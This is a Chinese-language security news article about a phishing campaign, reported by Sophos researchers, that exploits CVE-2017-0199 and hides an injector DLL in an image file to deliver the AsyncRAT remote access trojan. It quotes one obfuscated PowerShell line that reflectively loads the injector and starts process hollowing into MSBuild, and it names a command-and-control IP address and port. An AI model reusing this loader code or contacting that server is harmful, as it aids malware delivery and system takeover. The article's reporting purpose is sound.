网络安全研究人员发现了一场复杂的恶意软件攻击活动，该活动运用了隐写技术，将恶意代码隐藏在看似无害的图像文件中。

这条攻击链利用了 Microsoft Office 的一个旧漏洞（CVE-2017-0199），最终传播了 AsyncRAT，这是一种远程访问木马，能够让攻击者完全控制受害者的系统。

攻击始于包含恶意Microsoft Office 文档的网络钓鱼电子邮件，这些文档旨在利用 CVE-2017-0199 漏洞，该漏洞于 2017 年 4 月首次被报告。

当这些文档被打开时，无需任何用户交互，它们就会触发远程 HTA 脚本的下载和执行。随后，该 HTA 脚本会下载一个被植入木马的合法 Windows 实用程序 Prnport.vbs。

一旦执行，被篡改的 Prnport.vbs 文件会构建并执行一个复杂的 PowerShell 脚本，该脚本会下载一个包含隐藏恶意代码的图像文件。

这个 PowerShell 脚本乍一看似乎无害，但包含了多种用于逃避检测的混淆技术。

Sophos 的研究人员认为，这场攻击活动特别危险，因为它具有多阶段的特性，并且使用了隐写技术来绕过传统的安全控制措施。

一位研究这场攻击活动的 Sophos 分析师指出：“这次攻击展示了威胁行为者的技术在不断演变。通过将恶意代码隐藏在普通图像中，攻击者可以绕过许多不会检查图像文件中是否存在可执行内容的安全解决方案。”

攻击流程

这次攻击最具创新性的方面在于所使用的隐写技术，即把恶意注入器动态链接库（DLL）隐藏在一个看似无害的图像文件中。

当受害者打开被篡改的图像时，他们看到的只是一张普通的照片，却不知道恶意代码就隐藏在其中。

PowerShell 脚本通过在图像数据中定位特定的 Base64 标记（> 和 >）来提取隐藏的代码。

提取出的代码显示出一个名为 “Microsoft.Win32.TaskScheduler” 的 DLL 文件，它运用进程空洞化技术将 AsyncRAT 的有效载荷注入到一个合法的 MSBuild 进程中。

这种技术使得恶意软件能够伪装成一个受信任的 Windows 进程来运行，这大大增加了检测的难度。

\(injectorReflection = [Reflection.Assembly]::(‘Lo’ + ‘ad’)(\)decodedInjector); \(executeMethod = [dnlib.IO.Home].(‘GetM’ + ‘ethod’)(‘VAI’).(‘Inv’ + ‘oke’)(\)null, @($finalPayloadURL, $null, $null, $null, “MsBuild”))

最终的有效载荷 AsyncRAT 会与位于 148.113.214.176:7878 的命令与控制服务器进行通信。

这个开源的远程访问工具为攻击者提供了广泛的功能，包括远程桌面访问、键盘记录，以及部署包括勒索软件在内的其他恶意软件的能力。